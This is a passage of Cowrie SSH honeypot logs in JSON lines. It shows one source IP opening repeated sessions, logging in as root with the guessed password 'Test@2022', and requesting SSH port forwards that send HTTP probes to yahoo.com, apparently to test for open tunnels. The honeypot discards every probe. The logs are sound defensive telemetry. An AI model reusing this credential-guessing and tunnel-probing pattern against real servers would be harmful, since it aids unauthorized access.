{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.236988Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.285402Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50723,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1cd08aafd23","protocol":"ssh","message":"New connection: 213.209.150.239:50723 (1.2.3.4:22) [session: f1cd08aafd23]","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.331495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.332659Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.379906Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.614952Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31916,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31916","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.663085Z","session":"f1cd08aafd23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.710699Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29939,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29939","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.845557Z","session":"f1cd08aafd23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.892691Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.940819Z","src_ip":"213.209.150.239","session":"f1cd08aafd23"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50763,"dst_ip":"1.2.3.4","dst_port":22,"session":"30109ec466c6","protocol":"ssh","message":"New connection: 213.209.150.239:50763 (1.2.3.4:22) [session: 30109ec466c6]","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.996330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.005505Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.053518Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.335794Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":9336,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9336","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.393211Z","session":"30109ec466c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.449933Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10749,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10749","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.606973Z","session":"30109ec466c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.663924Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.722044Z","src_ip":"213.209.150.239","session":"30109ec466c6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50814,"dst_ip":"1.2.3.4","dst_port":22,"session":"585c1d6f82c2","protocol":"ssh","message":"New connection: 213.209.150.239:50814 (1.2.3.4:22) [session: 585c1d6f82c2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.777299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.778246Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:05.834547Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.115743Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9413,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9413","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.173246Z","session":"585c1d6f82c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.229919Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":11326,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11326","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.387005Z","session":"585c1d6f82c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.443505Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.500812Z","src_ip":"213.209.150.239","session":"585c1d6f82c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50867,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a35e3efd2a2","protocol":"ssh","message":"New connection: 213.209.150.239:50867 (1.2.3.4:22) [session: 9a35e3efd2a2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.547209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.548131Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.595503Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.830333Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8701,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8701","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.879884Z","session":"9a35e3efd2a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:06.926966Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6290,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6290","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.061543Z","session":"9a35e3efd2a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.108576Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.156390Z","src_ip":"213.209.150.239","session":"9a35e3efd2a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50919,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeadc66b334e","protocol":"ssh","message":"New connection: 213.209.150.239:50919 (1.2.3.4:22) [session: aeadc66b334e]","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.202498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.212366Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.250210Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.484986Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":7676,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7676","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.533325Z","session":"aeadc66b334e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.580402Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28360,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28360","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.725447Z","session":"aeadc66b334e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.772730Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.820482Z","src_ip":"213.209.150.239","session":"aeadc66b334e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50961,"dst_ip":"1.2.3.4","dst_port":22,"session":"78c3a806ab94","protocol":"ssh","message":"New connection: 213.209.150.239:50961 (1.2.3.4:22) [session: 78c3a806ab94]","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.867177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:07.868319Z","src_ip":"213.209.150.239","session":"78c3a806ab94"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman